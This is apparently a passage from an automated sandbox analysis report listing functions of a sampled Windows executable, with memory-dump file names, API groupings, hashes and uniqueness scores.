                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *MEMCAB
                                                                    • API String ID: 0-3211172518
                                                                    • Opcode ID: 6afdfd805b350688c3602c957db617d8632adc9201ddbe5db9da4816f6311d69
                                                                    • Instruction ID: d7270c8b72b84680a77ab85306004c5903f86e69a4bfad50e219bd88d8f06d33
                                                                    • Opcode Fuzzy Hash: 6afdfd805b350688c3602c957db617d8632adc9201ddbe5db9da4816f6311d69
                                                                    • Instruction Fuzzy Hash: 0C317FB1A14B4485FB508B11E8843D9B3A1B7047B4F90063ED96D423D8EF39C66ACB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB67C20 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                    • String ID:
                                                                    • API String ID: 140117192-0
                                                                    • Opcode ID: 3705a83dead617d7ec271545f917a4e3987cacfa7ba11eb70581d06d55b83e20
                                                                    • Instruction ID: 078b6fc50b23c47f0f8fdc23c04a910eb45161e0aa85a7b84a087f1937d5e5a5
                                                                    • Opcode Fuzzy Hash: 3705a83dead617d7ec271545f917a4e3987cacfa7ba11eb70581d06d55b83e20
                                                                    • Instruction Fuzzy Hash: C541D7F5A05B4482EB509B58F890395F3A4F3897A9FA0413ADA8D83768DF3DC65AC740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB67304 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                    • String ID:
                                                                    • API String ID: 1214682469-0
                                                                    • Opcode ID: 8af9f5df09fb230a588841b58d700163d72a1dc5bf7f8989bca99a4abbe73bfe
                                                                    • Instruction ID: 1b325de28fb817f69bf8f646540bad45c85b1ca4d29d8509f3b7c56287ba40bc
                                                                    • Opcode Fuzzy Hash: 8af9f5df09fb230a588841b58d700163d72a1dc5bf7f8989bca99a4abbe73bfe
                                                                    • Instruction Fuzzy Hash: 95110DB5B05B4082EE209B12F40479AE6A1F759FF4F584639AE9907BD9DF3CD6428B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB67DF8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                    • String ID:
                                                                    • API String ID: 140117192-0
                                                                    • Opcode ID: 04fa2115b3eb68aec4ea8641280f1283d8aa92b6bb6640a1a0ecb199eb4784e3
                                                                    • Instruction ID: e880d0a5b5f06eaae903bdea3d3e22fc663176c8c79b7a593a8c48e97452aae5
                                                                    • Opcode Fuzzy Hash: 04fa2115b3eb68aec4ea8641280f1283d8aa92b6bb6640a1a0ecb199eb4784e3
                                                                    • Instruction Fuzzy Hash: CC21A4F5A15B4486E7109F55F880389F3A4F389B69F60013ADA8D43768DF7DC65AC740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB6745C Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Prev$Next
                                                                    • String ID:
                                                                    • API String ID: 3260447230-0
                                                                    • Opcode ID: 8f04076bf7384626d75a864c6dfc3af67e08eec1412e220a3fe757313dad08a7
                                                                    • Instruction ID: 438169dae1cb4647ae2c825f63a07c781d9768cef03b810fb3c9791b5924866d
                                                                    • Opcode Fuzzy Hash: 8f04076bf7384626d75a864c6dfc3af67e08eec1412e220a3fe757313dad08a7
                                                                    • Instruction Fuzzy Hash: 7001DDF1E0568082FB514B21E9483A9EE91A349FF0F184274DB66077CDCE1CC9838701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB63908 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                    • String ID:
                                                                    • API String ID: 2776232527-0
                                                                    • Opcode ID: 3aee720f3c8c46dcd25b27dd5854f200cc9db310b4e25a0c757932c117ee5bc3
                                                                    • Instruction ID: 445b835fdf7ccb2a6ddfa9c248a479c414a67b15ee030fcf4c67c97a09eb74c6
                                                                    • Opcode Fuzzy Hash: 3aee720f3c8c46dcd25b27dd5854f200cc9db310b4e25a0c757932c117ee5bc3
                                                                    • Instruction Fuzzy Hash: 4F01B5B2B2864187F7B0CF34E884BAAE7A0F794764F445139D646429DCDB78C28ACF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%